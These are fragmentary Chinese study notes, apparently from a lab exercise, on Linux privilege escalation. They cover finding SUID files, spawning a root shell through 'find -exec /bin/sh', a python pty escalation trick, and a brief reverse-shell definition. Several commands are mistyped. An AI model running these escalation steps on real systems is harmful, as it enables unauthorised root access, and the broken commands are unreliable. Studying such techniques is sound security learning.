find获得权限的笔记
SUID提权的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。
使用find命令查看拥有suid权限的文件
find / -user root -perm -4000-exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/del/null
按照刚刚学的
find text.sh -exec "/bin/sh" \;
所以这里的提权语句是 find / -name corn.php -exec "/bin/sh"\是找到名字为 corn.php的文件然后获取他的root权限
root用户是指唯一的超级用户
什么是反弹shell 反弹shell就是主机主动连接攻击机发送信息
sudo python -c 'import pty;pty.spawn("/bin/bash")'
这是python提权的常见姿势
成功
连接数据库
其实已经连接到use的数据库了 只是还是显示mysql
输入 showtables;
用户被加密
用的是php框架